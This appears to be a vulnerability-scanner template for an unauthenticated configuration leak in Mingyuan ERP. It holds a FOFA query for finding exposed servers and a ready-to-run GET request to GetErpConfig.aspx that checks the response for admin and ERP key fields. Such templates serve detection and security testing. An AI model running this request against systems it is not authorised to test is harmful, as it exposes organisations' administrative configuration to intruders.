id: mingyuanyun_ERP_GetErpConfig_unauthorized

info:
  name: mingyuanyun_ERP_GetErpConfig_unauthorized
  author: PokerSec
  severity: high
  metadata:
    fofasearch: body="报表服务已正常运行"


http:
  - raw:
      - |
        GET /service/Mysoft.Report.Web.Service.Base/GetErpConfig.aspx?erpKey=erp60 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"AdminUserCode") && contains_all(body,"ErpKey")